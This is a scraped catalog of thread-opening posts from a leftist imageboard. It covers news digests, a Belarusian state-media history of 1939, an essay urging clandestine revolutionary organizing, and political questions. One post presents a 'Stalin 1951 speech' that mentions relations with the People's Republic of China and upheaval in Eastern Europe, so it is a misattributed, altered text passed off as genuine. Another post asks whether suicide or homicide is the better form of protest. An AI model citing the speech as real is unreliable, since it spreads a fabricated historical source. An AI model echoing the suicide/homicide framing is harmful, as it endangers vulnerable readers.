Did military manufacturers all collectively forget what the term ‘miniaturization’ meant? Why tf is every infantryman of today looking like a fucking blob? What’s the need to make uniforms so fucking thick of they won’t protect the user from anything? Why do they carry so much shit if most of the electronic devices and equipment can be miniaturized to reduce weight and improve mobility? Similarly, why tf are so many other modern weapons and gadgets used in war getting so fucking unconventionally chunky? Some of these soldiers can’t even keep their slings wrapped around their bodies…
R: 88 / I: 46

9/11 Thread

since we missed the date by being down, please discuss this event, its causes, and its ramifications.
>The September 11 attacks, commonly known as 9/11, were four coordinated Islamist terrorist suicide attacks carried out by al-Qaeda against the United States in 2001.
R: 142 / I: 36

america twitter activism and gaza

To clarify I am pro-Palestine and have held this stance for quite some time now. I do believe that recent wave of palestine supporters have good intentions(and done a lot of genuine good) but I find certain aspects of their activism fascinating, cause they come directly from american twitter activism and its intersecting to see that deal with a real-life issue cause over the past decade this activism has campaigned and marched for causes like american bipoc struggles and queer activism
And while I believe that the majority mean well(and actually haven't done any harm) they are employing tactics and rhetoric that don't make sense outside twitter activism, For instance I came across popular posts stating, "You probably didn't know that x is actually was Invented by Palestinians" or discussing how Palestine is connected to the experiences of black or queer people
R: 2 / I: 0
I have read a lot of James Connolly's works,
Is there any other irish socialist writers I can sink my teeth into?
R: 0 / I: 0

Belarus marks Day of People’s Unity

MINSK, 17 September (BelTA) – Belarus marks the Day of people’s Unity on 17 September. The holiday was instituted on 7 June 2021 by Belarusian President’s Decree No.206.

The holiday celebrates the beginning of the Red Army's liberation campaign in Western Belarus in 1939, which resulted in the reunification of the Belarusian people, divided under the terms of the Treaty of Riga.

The territory of Belarus was divided between the two states as a result of the Polish-Soviet War of 1919-1920. The eastern part of Belarus became the Byelorussian Soviet Socialist Republic, part of the USSR. The western territories of Belarus were annexed to Poland - some of the lands were seized by the Poles during the war, and some of them were agreed under the Treaty of Riga, signed on 18 March 1921.

The Polish state included the territory of more than 112,000 square kilometers with a population of 4.6 million people (according to 1931 data). These lands were given the unofficial name of Western Belarus, which the Polish authorities did not recognize. In official documents, these territories were more often called Kresy Wschodnie.

Western Belarus was a relatively backward agrarian outskirt of Poland. The region was mainly used by the state as a source of raw materials and cheap workforce. The working day in industry lasted for 10-12 hours, salaries were lower than in the other Polish regions. More than 80% of the region's population was engaged in agriculture.

The Polish authorities pursued a policy of polonization and assimilation against Belarusians. They prohibited the use of the Belarusian language in state institutions and banned Belarusian schools. Out of 400 Belarusian schools that operated on the territory of Western Belarus before the Polish occupation, only 16 remained in 1934, and none was left in 1939. The Belarusian press was persecuted. If there were 23 Belarusian newspapers and magazines legally published in 1927, then in 1932 there were eight of them, and only pro-Polish and clerical publications remained until 1937. There were no Belarusian theaters and musical institutions in Western Belarus. The authorities found various reasons to close Belarusian publishing houses, libraries and village reading rooms.

The main method the Polish government used was coercion and often terror. Mass police repression of the population during punitive expeditions to subdue farmers uprisings was commonplace. Political trials were a regular thing. Prisons were used to isolate “socially dangerous elements”. The Bereza Kartuska concentration camp was established in 1934. According to incomplete data, the camp saw more than 10,000 prisoners over the five years of its operation.

The Belarusian people have never accepted the situation they got in. For 20 years Belarusians fought for social and national liberation, and their struggle took different forms at different times, but never ceased. Workers' and farmers' demonstrations were a common thing at that period. Cultural and educational organizations, with the Belarusian School Association to be the leading one, made their considerable contribution. The Communist Party of Western Belarus was at the head of the revolutionary movement for many years.

In the late 1930s, the threat of war from Nazi Germany loomed over the entire Europe. The situation required joint actions from the leading countries of Western Europe and the USSR to prevent the war. Realizing this, the Soviet Union made a number of attempts to set up an anti-Hitler alliance with the UK, France and other Western countries in the second half of the 1930s. However, the leading European states refused the offer, secretly seeking to direct Hitler's aggression eastward. The Soviet Union was faced with a choice: either to continue a one-on-one confrontation with Germany's growing military power, or to make attempts to diplomatically ward off the threat. Under such circumstances, the USSR concluded a nonaggression pact with Germany, which was signed in Moscow on 23 August. The document was accompanied by an additional secret protocol on the division of spheres of influence between Germany and the Soviet Union. According to this document, in the event of the liquidation of the Polish state and the division of its territories, the USSR's sphere of influence included the lands of Western Belarus.
On 1 September 1939, Hitler's Germany attacked Poland. The Second World War began. German divisions crossed the border in several directions and began to advance rapidly deep into the Polish state. Its government and commanders were unable to organize an effective defense and abandoned the country in the third week of the war.

In mid-September, German troops approached the territory of Western Belarus and Western Ukraine. The German leadership, referring to the agreement of 23 August, hurried the Soviet Union to act against Poland. Stalin, however, was delaying the intervention. Only when the Polish army was defeated, practically all the original Polish territories were occupied by German troops, and only isolated points of resistance remained in the country, did the Soviet government order the Red Army to cross the border.

On the morning of 17 September 17, the Polish Ambassador in Moscow received a note from the Soviet Government. It said: “The Polish-German War has revealed the internal instability of Polish State. During 10 days of military operations Poland has lost all its industrial regions and cultural centers. Warsaw as the capital of Poland no longer exists. The Polish Government has scattered and gives no signs of life. This means that the Polish State and its Government factually have ceased to exist. By this fact in itself treaties concluded between the Union of Soviet Socialist Republics and Poland have lost their validity. Left to shift for itself and left without leadership Poland has become a convenient field for all kinds of eventualities and unforeseen contingencies which may constitute a threat to the Union of Soviet Socialist Republics. Therefore having been heretofore neutral the Soviet Government can no longer adopt a neutral attitude to these facts. The Soviet Government can also not be indifferent to the fact that the consanguine Ukrainians and Belarusians living on the territory of Poland who have been left to the whim of fate should be left defenseless. In view of this situation the Soviet Government has issued instructions to the Red Army High Command to give the order to its forces to cross the Polish border and take under their protection the life and property of the population of Western Ukraine and Western Belarus.

The note was signed by Molotov, People's Commissar for Foreign Affairs of the USSR. He also made a radio address to the Soviet people.

The advance of the Soviet troops was rapid: on 18 September they occupied Sventyany, Lida, Novogrudok, Slonim, Volkovysk; and Pruzhany and Kobrin on 19 September.

Most units of the Polish Army surrendered without a fight. The units that included mostly ethnic Ukrainians and Belarusians, went over to the side of the Red Army. They were immediately sent home. Polish officers and policemen were sent by echelons to Soviet camps.

The main part of the population of Western Belarus welcomed the Soviet soldiers with joy and rendered effective assistance. Military and revolutionary committees were set up in many places to organize detachments of workers and farmers. These formations disarmed the police, took under guard bridges, enterprises and other important facilities.The battle for Grodno lasted for several days. About 3,000 soldiers and officers of the training unit and policemen put up a resistance here. On 20 September the city was taken, and on 22 September Soviet troops entered Brest-Litovsk and Bialystok.

With the arrival of the Red Army new authorities were formed in voivodeships and district centers. Those were temporary administrations in cities, and village committees in towns and villages. They were engaged in the implementation of the first reforms, and then in the organization of elections of deputies to the People's Assembly of Western Belarus, which was to decide the main issues of the state system. The elections were held on 22 October 1939.

The People's Assembly of Western Belarus was held in Bialystok on 28-30 October 1939. It adopted the Declaration on the proclamation of Soviet power and the incorporation of Western Belarus into the BSSR. On 2 November 1939 the extraordinary 5thsession of the Supreme Council of the USSR of the first convocation decided to satisfy the request of the People's Assembly of Western Belarus and to incorporate Western Belarus into the USSR and unite it with the Belarusian SSR. The final legislative act was the adoption of the law “On the admission of Western Belarus to the Belarusian Soviet Socialist Republic” by the extraordinary 3rdsession of the Supreme Council of the BSSR on 14 November 1939.

The territory and population of the republic almost doubled. Baranovichi, Bialystok, Brest, Vileika and Pinsk regions were formed on the western Belarusian lands that became part of the BSSR. Big social and economic transformations took place in these regions. Enterprises and banks were nationalized, collectivization and mechanization of agriculture were carried out. Radical changes took place in education, healthcare, science and culture.

The work on liquidation of illiteracy was intensified, and educational institutions were set up for different ethnic groups of the population: there were 4192 Belarusian, 987 Polish, 173 Russian, 168 Jewish, 63 Lithuanian, 43 Ukrainian schools operated in the western regions of the BSSR in 1941. Theaters, 100 cinemas, 92 houses of culture, 220 libraries were opened. Belarusian-language pressbegan operating in all regional towns and district centers. The progressive development of economy and social sector of the western regions of the republic was interrupted by the start of the Great Patriotic War.
R: 261 / I: 93

/DPRK/ - Democratic People's Republic of Korea General

Thread for news and discussions of the Democratic People's Republic of Korea, its material conditions, the status and health of its socialist tradition, disproving common myths about it, etc.

Archive of the previous DPRK thread:
R: 15 / I: 3
why can't communism nationalize ford and mass industrialize a standard car that's functional for all americans to use and is free? everybody should get a free car
R: 29 / I: 7  
I'm a furry, but i feel kind of excluded from the fandom as there's such a commercialized culture around it that costs so much money, and all the cons are in big cities that require a lot of money and job/education experience to enter and live in. I feel like, for such a group that focuses on inclusivity, it wasn't really meant for poor or working people like me even though i'm a gay furry.
R: 11 / I: 2
Never before have revolutionary mass protest movements been able to spread so quickly
Never before has communist agitprop been so easy, widespread, and popular
Never before has the United $nakes and their imperialist puppet allies need to coalesce to ban a single app
Never before has a chinese cultural dick been this far up the West and throbbing

TikTok is to communism what the Printing Press was to proto-capitalism

Make a TikTok account and post vids, it’s your communist duty
R: 3 / I: 1

News 9/16/24

Bolivia’s iconic ex-President Evo Morales calls for anti-government march, escalates political fight
Bolivia’s hugely popular former leftist president, Evo Morales, on Monday called on supporters to take to the streets in protest against his bitter political rival, current President Luis Arce, who hours earlier accused Morales on national TV of trying to overthrow him. Morales’ appeal to Bolivia’s farmers, miners and peasants followed President Arce’s unprecedented televised speech late Sunday lambasting his former mentor. Accusing Morales of trying to sabotage his administration and undermine democracy, Arce escalated a high-stakes power struggle that has pushed Bolivia to the brink.

Milei doubles down on austerity in proposed new Argentinian budget
In an unprecedented move, Mr Milei personally pitched the budget to Congress instead of his economy minister, slamming Argentina’s history of “macroeconomic mismanagement” and promising to veto anything that compromised his commitment to austerity.

Israeli army says ‘high probability’ its strike killed three Gaza captives
After denials for months, the Israeli military says there is a “high probability” its air strike was responsible for the deaths of three Israeli captives in Gaza in November. The military on Sunday said it was unaware the captives were present in a tunnel in the Palestinian territory when they launched the attack on November 10, 2023.

Israeli settlers raid, attack West Bank primary school
According to local sources, settlers were armed with batons which they used to carry out the assaults, spreading widespread fear among residents. The sources added that the school remained under siege with students being trapped inside. The Palestine Red Crescent Society said three people were wounded in the assault and were transported to a nearby hospital.

Mahsa Amini's family under house arrest in Iran on second anniversary of death
On Friday, her father said that he and others would hold a vigil at Amini's gravesite in the western city of Saqqez to mark the anniversary if the authorities allowed them. According to Kurdish news outlet RojNews, however, he and his wife were placed under house arrest, while the route to the cemetery was blocked off and security forces deployed throughout the city.

Putin orders military to boost troop numbers by 180,000 to 1.5 million as Ukraine fighting continues
Putin’s decree, published on the official government website, will take effect Dec. 1. It sets the overall number of Russian military personnel at nearly 2.4 million, including 1.5 million troops, and orders the government to provide the necessary funding.

Thousands of workers protest massive job cuts at Brussels car factory
Protests erupted after German car manufacturer Audi announced that it would “phase out” production at its Forest plant in southern Brussels — threatening around 3,000 jobs.Police estimate that around 5,500 demonstrators took part in the march.

The Taliban have suspended polio vaccination campaigns in Afghanistan, the UN says
News of the suspension was relayed to U.N. agencies right before the September immunization campaign was due to start. No reason was given for the suspension, and no one from the Taliban-controlled government was immediately available for comment. A top official from the World Health Organization said it was aware of discussions to move away from house-to-house vaccinations and instead have immunizations in places like mosques.

Japan's elderly population grows to record 36.25 million
The population of people aged 65 and over in Japan was estimated at 36.25 million as of Sunday, up by 20,000 from a year earlier and hitting a record high, the internal affairs ministry said ahead of Monday's Respect for the Aged Day.

At least 20 likely dead in violence near Papua New Guinea gold mine, local media reports
Home to hundreds of tribes and languages, the Pacific nation to Australia's north has a long history of tribal warfare. However, violence has ratcheted up over the past decade as villagers swapped bows and arrows for military rifles and elections deepened existing tribal divides. Violent attacks on three remote villages in July in the country's north killed 26 people, including 16 children, according to the United Nations.
R: 88 / I: 17

Is the situation in Poland since 1989 so bad?

I'm a woman born in 2000. Poland was then a Capitalist country. What is my future here, as a 24 year old woman? Am I gonna be sold to the pornography and prostitution industries and nobody will help me? Are Polish women that badly treated in Capitalist Poland? Redpill me. Tell me the truth about this forsaken country.
R: 1 / I: 0

Stalin's speech to the bolshevik party, 1951.

Ever since last year some countries have imposed sanctions on the Soviet Union. I think, first, they have no right to do so; second, experience has proved that the Soviet Union has the ability to withstand these sanctions. Our economic development has been affected to some extent, but not very seriously. In fact, the sanctions are gradually abating. One special feature of the Soviet Union’s development is that it has proceeded under international sanctions for most of the thirty years since the founding of the Socialist Republic. If there is nothing else we’re good at, we’re good at withstanding sanctions. So we are not worried or pessimistic about them; we take them calmly. Despite the trouble that has arisen in Eastern Europe, and despite the sanctions imposed by several Western countries, we adhere to one principle: to maintain contacts and build good relations with the People's Republic of China, with the United States of America, and also with Japan and the European countries. We have never wavered in this principle. The Soviet Union is magnanimous and is not upset by trifles like that.

The Soviet Union will never accept interference by other countries in its internal affairs. It was on the basis of our own conditions that we decided upon our social system, a system that our people endorse. Why should we accept foreign interference designed to change that decision? The key principle governing the new international order should be noninterference in other countries’ internal affairs and social systems. It won’t work to require all the countries in the world to copy the patterns set by the United States, Britain and France. There are many Islamic countries, making up one fifth of the world’s population. In these countries it is absolutely impossible to introduce a so-called democratic system of the American type. The Soviet Union, with another sixth of the world’s landmass, will not adopt America’s capitalist system either. The African countries too, through the United Nations, demand with one voice that no other country interfere in their internal affairs. This is the general trend throughout the world.

Given this background, if the Western developed countries insisted on interfering in other countries’ internal affairs and social systems, it would lead to international turmoil, especially in the developing countries of the Third World, which need a stable political environment to lift themselves out of poverty. If there is political instability, how can they concentrate on solving the problem of food? Not to mention the problem of development. We must therefore take the principle of peaceful coexistence as the norms for the new international political and economic order. Hegemonism and power politics, which have emerged in new form, cannot last long. Allowing a few countries to monopolize everything, as they have done for years, has never solved any problems, and it never will.

The conditions necessary for the Soviet Union to reach its development goal are a stable domestic environment and a peaceful international environment. We don’t care what people say about us; what we do care about is to have a good environment in which to develop our country. We shall be satisfied if history proves the superiority of the Soviet socialist system. Whether the social systems of other countries are good or bad is not our business. After the events in Eastern Europe, I told some Americans not to rejoice too soon. The situation was complicated enough, the problems of Eastern Europe had not been solved, and it would be better for people not to provoke more trouble.

If the Soviet Union were in turmoil, can you imagine what it would be like? I don’t think it would simply be the same as the civil war, when the older generation of Lenin, Sverdlov, Dzerzhinsky and other prestigious leaders were around. There was fierce fighting, actual civil war. But now things have changed. If the situation deteriorated to the point where our Party and the state power couldn’t function, with each faction controlling a part of the army, a civil war would indeed erupt. As soon as they seized power, the so-called fighters for democracy would start fighting each other. And if a civil war broke out, with blood flowing like a river, what “human rights” would there be? If civil war broke out in the Soviet Union, with each faction dominating a region, production declining, transportation disrupted and not millions or tens of millions but hundreds of millions of refugees fleeing the country, it is the Donbass-Volga region, which is at present the most promising in the world, that would be the first to be affected. And that would lead to disaster on a world scale.

So the Soviet Union must not allow itself to descend into turmoil; we have that responsibility to ourselves and to all mankind. Even responsible foreign statesmen would acknowledge that the Soviet Union must remain stable. Human rights and democratic rights are not related to this question. The only solution is peaceful coexistence and cooperation of all countries with different social systems on the basis of the international solidarity, not interference in other countries’ internal affairs and provoking disorders. The Soviet Union has raised this question to alert everyone, to remind all countries to be careful when they decide on their policies towards the Soviet Union.
R: 500 / I: 165

/nordpol/ - Nordic General - Disk crash edition

The old OP is broken
R: 122 / I: 18

Using Geoengineering to deal with rising heat waves in the Global South

I'd like to give my perspective. I'm from a South Asian country. Other than a few brief years I've lived most of my life in my home town, as has my entire family for centuries. I had no problem with the heat and neither did my family. I used to jog in the summer without any issues. However about 4-5 years ago, the heat became unbearable. People in my community have suffered heat strokes, and thousands have already died. The effects of climate change where it starts affecting regular people have happened here, rveryone believes in it, The crops aren't all dead, the oceans haven't sunk cities, but they can feel the pain heat every time of time both day and night and they probably know someone who has suffered from a heat stroke
Now, a criticism I've seen from Westerners is that taking measures to end the painful heatwaves "won't fix the root causes" of capitalism. And listen I know that, but we are in pain here. I'm seeing people suffer as they leave their homes. I just don't see a way in which we can meet temperature goals, and there is no indication that countries are serious about cutting emissions to the extent needed.
R: 14 / I: 2

The proletarianization of managers and CEOs

Modern capitalists have distanced themselves from their former positions so much that a growing portion of global business is seeing formerly capitalist positions become proletarianized. More CEOs, managers, factory leaders, and executives no longer answer to themselves but to their investors. These people are becoming easily replaceable so much that some of the world’s largest corporations are seeing their CEOs getting regularly replaced over their ability to extract enough profits for their shareholder overlords. Their ownership is being stripped, and their payment is becoming increasingly attached to whatever their shareholders will allow. What exactly should such a change imply for a future revolt? Should the banker, the CEO, and the office worker be considered a prole?
R: 31 / I: 3

tokyo election

The united left candidate can't even score 2nd place in the just now Tokyo Governor election, a major flop considering the JCP managed more votes in a less important election a few years back
R: 38 / I: 5



The resurrection of Blanquism is not just a nostalgic nod to a bygone era, but a necessary response to the changing nature of power and control in the 21st century. As we've seen time and time again, attempts at open, public revolution are met with swift and brutal suppression by the state. The days of mass protests and demonstrations, once a hallmark of revolutionary movements, are now met with riot police, tear gas, and surveillance drones. The authorities have become increasingly adept at identifying and targeting key organizers and leaders, using advanced technologies like facial recognition software to track and disrupt dissent.

This is why Blanquism's emphasis on secrecy and clandestine organization is more relevant than ever. Blanqui's own experiences with underground revolutionary activity, including his involvement in several conspiracies and insurrections, demonstrate the importance of the importance of operating outside of the public eye. In an era where social media and online activity are constantly monitored and surveilled, the need for secrecy and encryption has become paramount. By adopting a more clandestine approach, revolutionaries can avoid the pitfalls of open, public organizing and create a more sustainable and resilient movement.

The threat of drone strikes and other forms of high-tech repression is a stark reminder of the dangers of open revolution. In countries like Yemen, Pakistan, and Syria, drone strikes have become a ubiquitous feature of modern warfare, often targeting individuals and groups with little regard for civilian casualties. The same technology that allows for precision strikes also enables the state to identify and track individuals with ease, making it increasingly difficult to organize openly. Blanquism's emphasis on secrecy and clandestine activity offers a way to evade this kind of surveillance and repression, allowing revolutionaries to operate outside of the state's line of sight.

Furthermore, the proliferation of facial recognition cameras and other forms of biometric surveillance has created a surveillance state that is unparalleled in history. In cities around the world, cameras equipped with facial recognition software are being used to track and monitor individuals, often without their knowledge or consent. This technology has the potential to completely disrupt and destroy any open, public revolutionary movement, as individuals can be easily identified and targeted by the authorities. By operating in secret, Blanquist revolutionaries can avoid this kind of surveillance and create a more secure and sustainable movement.

In this context, the resurrection of Blanquism is not just a theoretical exercise, but a practical necessity. By adopting a more clandestine approach, revolutionaries can create a movement that is better equipped to resist the repressive forces of the state. By operating outside of the public eye, Blanquist revolutionaries can build a more resilient and sustainable movement, one that is capable of challenging the power of capital and creating a better world. As the state continues to deploy new technologies and tactics to suppress dissent, the need for a Blanquist approach has never been more pressing.
R: 3 / I: 0


So, anons, considered that we all like to read theory, after sometime a question arises: what's to be done in real life? What practical step need to be done to actually fight the capitalist beast? It's cool to be a theorycel, but what about real living action? What one should be done to change things?
R: 42 / I: 10 (sage)

"Class reductionism"

Correct me if I'm wrong here, but isn't "class reductionism" the entire fucking point of communism? I've seen way too many "leftists" saying "class reductionism is white supremacy", "we must put intersectionality before class struggle" and "anti-idpol is anti-communist"
If being anti-idpol is anti-communist then what the fuck isn't?
R: 6 / I: 2

News 9/15/24

Ballistic missile fired by Yemen’s Houthis hits Israel sparking fire
Houthis’ Saba news agency said the Israeli defence system could not shoot down the Yemeni missile, which caused a fire. “A Yemeni missile reached Israel after ’20 missiles failed to intercept’ it,” Nasruddin Amer, a Houthi media official, posted on X.

Iran upping repression of women 2 years after Amini's death: UN experts
They also warned that state authorities had enhanced surveillance for hijab compliance, including in private spheres like vehicles, and with a range of tools, including drones. At the same time, a new "Hijab and Chastity" bill, which is in the final stages of approval, provides for harsher penalties for women who do not wear the mandatory hijab – including soaring fines, long prison sentences and travel bans.

Owner of company that spied on Assange for the CIA was collaborating with Spain’s secret service
In addition to this documentary evidence, to which EL PAÍS has had access, three sources with ties to the Spanish intelligence services and collaborators of Morales have confirmed that the former military man worked on different operations for the Spanish intelligence services. “Relax, I am with God, with the one here (CNI) and the one there (CIA),” he confessed to a person he trusted who warned him of the risks of this activity. An official spokesperson for the CNI declined to answer questions from this newspaper.

Ukraine renews calls on the West to approve long-range strikes on Russian territory
Ukraine made a new call Saturday on the West to allow it to strike deeper into Russia after a meeting between U.S. and British leaders a day earlier produced no visible shift in their policy on the use of long-range weapons.

Germany to welcome Kenyans in labour deal
The German government has said the deal does not specify the number of workers who will be allowed in. Migration agreements are a central pillar in the German government's efforts to curb immigration. The agreement will also simplify the repatriation of Kenyans who are in Germany without legal permission.

Sudan: Fighting breaks out in el-Fasher following RSF attack
Minni Minawi, governor of the Darfur region, said the Sudanese army had repelled "a large attack" by the RSF, but the group claimed to have advanced and captured military sites in the city. "The neighbourhoods are completely empty and all you can hear are explosions and missiles," Ibrahim Ishaq, 52, who fled the city on Friday heading west, told AFP.

Former world leaders ask Biden to remove Cuba from list of state sponsors of terrorism
According to the signatories, which include former Colombian president Ernesto Samper, Brazil’s Dilma Rousseff, Argentina’s Cristina Fernández de Kirchner, Spain’s José Luis Rodríguez Zapatero, Bolivia’s Evo Morales and Ecuador’s Rafael Correa, naming Cuba as a country that sponsors terrorism is not only “a coercive measure that is difficult to justify in the 21st century,” but it has also contributed to the unparalleled economic crisis that the country is going through and the subsequent exodus, which already far exceeds the sum of previous waves of migration.

Hundreds of thousands in Cuba without water
Spare parts for outdated water infrastructure, like pipes and pumps, are in short supply, officials said. And without fuel and adequate transportation, even emergency water supply by cistern truck has been limited, according to residents.

Sri Lankan opposition leader says he will renegotiate IMF reforms if he wins presidency
SRI LANKA’S opposition leader said on Thursday that if he wins the country's presidential race, he will renegotiate the International Monetary Fund economic reforms package to ensure rich residents pay more taxes and poor ones see their conditions improve. Sajith Premadasa, the opposition leader in Parliament said that his party has already started discussions with the IMF to find ways to ease people’s tax burden.

Japan tries to reclaim its clout as a global tech leader
Now, after a period of stagnation that Japan’s economy ministry refers to as "the lost three decades,” Tokyo is engaged in a multibillion-dollar industrial policy to jump-start the lackluster economy and recapture its position as a tech innovator.

South Korea declares emergency medical response amid doctors' strike
The government will also temporarily raise the fees doctors receive from health insurance around a national holiday period next week to “repay the dedication of the medical professionals even a little,” Prime Minister Han Duck-soo told a televised briefing. This includes raising by 3.5 times the examination fees specialist doctors receive at regional emergency medical centers, responsible for severe emergency patients, Han said.
R: 19 / I: 6 (sage)

Are "black nationalists" just chuds with a different skin color?

Any ideology founded on idealism (racial essentialism) is destined to degrade into literal fascism. Just look what happened to Zionism.
R: 68 / I: 12 (sage)

Canada Check-In

How's things going up there?

There seems to be a lot of shit going on in Canadian Communism in the last few years, with the rise and fall of the PCR-RCP, then the development of the IMT in Canada, and now the formation of New Communist Party of Canada.


They have a fairly detailed programme, that I would appreciate some people's thoughts on here.
R: 499 / I: 119 (sage)

/leftybritpol/ - UK General

/leftybritpol/ - UK General
R: 227 / I: 48  

/leftypol/ outage

I'll make this brief. /leftypol/ was offline from around September 9, 2024 (Monday) until September 12, 2024 (Thursday). This was due to a hard disk failure on the server. When the split happened a few years ago, one of the previous mods/admins rented a bare metal server from a company (as opposed to a VPS/virtual machine instance) for us to host /leftypol/ on. As a result the hardware was not abstracted away. We were unable to boot the machine. Furthermore this individual, having paid for the server in advance, has since gone missing and has been so for at least 34 weeks. We were unable to log into the cloud account due to it sending his email address confirmation message which we were obviously unable to access. As a result, we could not ask the hosting company for support. Also as a result, the only thing we had access to was the cloudflare and a dated sql dump+copy of the source code. As far as I know, the media files (including pdfs), wiki, minecraft server, leftypol tv, etc. are all gone and even if the aforementioned individual returns, its possible that it still won't be able to be recovered due to the fact that they were on a hard disk that failed.

In order to rebuild /leftypol/ we had to secure new hosting, spin up and configure a server with software, firewall, etc. transfer and fix+configure the vichan/lain/leftypol source code, and load the SQL database dump, as well as configure cloudflare. This process was painstaking and slow. I suppose this goes to show the precarious nature of /leftypol/ in that both the domain name (paid for 10 years in advance and donated to the current mod team) and hosting have/are being paid by one individual as a passion project.

We are working diligently to secure backups so this will not happen again in the future.

Thank you for your patience - tech jannies
R: 13 / I: 1 (sage)

The 美国的 Left has a problem

This article https://www.piratewires.com/p/oakland-defund-police-movement-earl-harper-lateefah-simon is written by a Zionist funded organization to promote right-wing oligarchy and ignore Palestine protests.


It illustrates the problem with not militantly opposing the grifters who wrap themselves in leftist language.

Leftism in 美国 cannot advance until such elements are fully removed and discredited. These grifters are the public image and unfortunately the reality of the left wing of American politics. such grifters out to be kicked out and denounced. These grifters are part of the same complex that denounces Palestinian resistance. If you encounter them run them out, they create the most potent enemies of leftism. Their hypocrisy and collaboration makes them the first obstacle to creating an actual leftist movement in 美国

short excerpt
>The Anti Police-Terror Project — co-founded by Earl Harper — gave at least $800,000 to organizations run by Harper and at which his mother and, until recently, wife are board members, along with $55,000 to the personal LLC of APTP’s vice president.
R: 19 / I: 1
Organizing via hobbies and non-work communities?

Is this a viable route? Let's say you play a lot of fighting games, you know people, these are your friends, is it worth it to start that dialogue about communism in these groups? Could this be an effective means of organizing in the "gig economy" era of hyper-neoliberal individualism?
R: 46 / I: 11


>orthodox marxist
>marxist leninist
>anarcho communism
>democratic socialism
>socio democracy

So on and on, but I wonder what of those actually is true in the sense the really capture how the world truly works, what leftypol thinks is the really one that really understand the world?
R: 2 / I: 1
Ok, leftypol, you're right. what's a better form of protest? suicide or homicide? both hurt the bourgeoisie.
R: 19 / I: 0

soviet agriculture

it is no secret that food production didnt work properly in the soviet union, during Stalin quotas were high and productivity per hour was low. Krushev had a small spike during his unscientific conquest of fertile lands which ended quote promptly. by time Breznev took over the soviet union had a net deficit of export to import of food and the new leader did barely anything to fix the issue. why was soviet agriculture so lacking? what could've fixed it?
R: 25 / I: 0

State Socialism?

Do we actually need the state to get to socialism, or is it just another tool of oppression that’s going to stop us from ever reaching real communism? Marx talked about using the state to overthrow the bourgeoisie, but let’s be honest: once you give the state power, can we really trust it to wither away like it’s supposed to? Or is it just going to entrench itself and keep us stuck in another form of control? With the state stronger than ever today, is it naïve to think we can reach socialism (let alone communism) without some kind of power structure? Or should we be looking for ways to go around it entirely?
R: 7 / I: 4

News 9/13/24

In a historic move, Colombia bypasses patent to access HIV drug
The Colombian government took a historic step. It issued its first-ever compulsory licence, a legal mechanism that allows it to co-opt the drugmaker’s patent in the name of public interest. That decision is expected to clear the way for Colombia’s health programmes to buy generic doses of the drug at a much lower cost. But bypassing the patent has enmeshed Colombia in an ongoing lawsuit with the pharmaceutical company ViiV Healthcare, which has openly protested the compulsory licence.

Trudeau says government will not intervene in Air Canada dispute with pilots
The Canadian government will not intervene to end a dispute between Air Canada and its pilots and intends instead to pressure both sides to avert a strike, Prime Minister Justin Trudeau said on Friday.

Managers of a state fuel company in Trinidad are charged in the 2022 deaths of four divers
Two top managers of Paria Fuel Trading Co., a subsidiary of Trinidad Petroleum Holdings, pleaded not guilty on Wednesday to accusations they violated the Occupational Safety and Health Act, according to local media reports. Also charged was the director of Land and Marine Contracting Services Ltd., a company contracted by Paria to repair the pipeline. Local newspapers reported that the director’s son died in the incident.

UNRWA says staffer killed in Israeli West Bank raid
The agency, known as UNRWA, said the employee was "shot and killed on the roof of his home by a sniper", and that it was "the first time an UNRWA staff member has been killed in the West Bank in more than 10 years". The incident took place in the Faraa refugee camp in the northern West Bank, the statement said.

UN is cutting back on Yemen activities after crackdown by Houthi rebels on humanitarian staff
The U.N. has narrowed its focus to “essential lifesaving and life-sustaining activities,” she said, and is deprioritizing broader activities to develop the Arab world’s poorest nation.

Jordan's Islamists boosted in election by protest votes over Israel's war on Gaza
The IAF, the political arm of the Muslim Brotherhood, won up to a fifth of the seats under the revamped electoral law, which for the first time allocated 41 seats for parties, according to preliminary figures seen by Reuters and confirmed by independent and official sources.

In Tunisia, refugees and migrants are expelled to the desert, left helpless
First recorded in July last year, expulsions have become a part of a crackdown on migration in Tunisia, one that has seen activists and NGOs prosecuted for providing aid to people targeted by security services. Nobody knows for sure how many refugees and migrants there are in Tunisia. About 16,500 people are registered with the Office of the United Nations High Commission for Refugees (UNHCR).

German state bans Islamic center over alleged Hamas links
It is the second high-profile raid of an Islamic center in Germany in recent months, after authorities shut down the Hamburg Islamic Center after it was deemed an "Islamist extremist organization" with links to Iran and Hezbollah.

Plans for scrapped section of HS2 receives mixed reception from unions and campaigners
The proposed new 50-mile railway line between the Midlands and north-west England would be slower and cheaper than the original proposals which were axed amid spiralling costs by former prime minister Rishi Sunak last October.

Indian opposition leader Arvind Kejriwal released on bail
On Friday, India’s supreme court ruled that, Arvind Kejriwal, who is the chief minister of Delhi, should be immediately released from jail in Delhi, where he has been held since his arrest in March. The judges ruled that as his trial was unlikely to be completed for some time, his “prolonged incarceration amounts to unjust deprivation of liberty”.

Could Marxist Anura Dissanayake become Sri Lanka’s next president?
For months now, Dissanayake has enjoyed a different kind of authority within Sri Lankan politics, which has in turn earned him recognition as a rising political force even from regional superpower India. He is a surprise top contender for the country’s presidency, when the Indian Ocean island votes on September 21. Some opinion polls even suggest he could be the frontrunner, among a crowd of 38 candidates.

Garment workers in Bangladesh mobilize for wages withheld due to national shutdown
The workers are calling for an increase in attendance bonuses and tiffin (meal) allowances, as well as an end to random layoffs and wage discrimination between different groups of workers and in the recruitment of male and female employees. Attendance bonuses, paid by factory owners, serve as an incentive for regular attendance.
R: 39 / I: 4

Are homeless people really lumpen?

Aren't they the worst victims of all? They of all people have been the most blatantly opressed by capitalism at every turn. Isn't it reactionary to say they're to blame when the root is clearly systemic? In most cases they're completely unable to secure employment, it's not like they don't want to. In fact a good portion of homeless people actually work full time.
So why are lumpenproles (and in turn homeless people) so hated here? And wouldn't they have even more revolutionary potential after being failed by a system that can't even provide them a roof over their head or food in their stomach?
R: 4 / I: 1

Reading of the Day 11

In Refutation of Modern Revisionism’s Reactionary Theory of the State
<by Wang Jiaxian, published in the June 16, 1958 issue of Hongqi (Red Flag)

The Renmin Ribao editorial “Modern Revisionism Must Be Repudiated” pointed out that one of the fundamental points in modern revisionism, as typified by the programme put forward by the leading group in Yugoslavia, is its substitution of the reactionary theory of the state standing above classes for the Marxist-Leninist theory of the state.
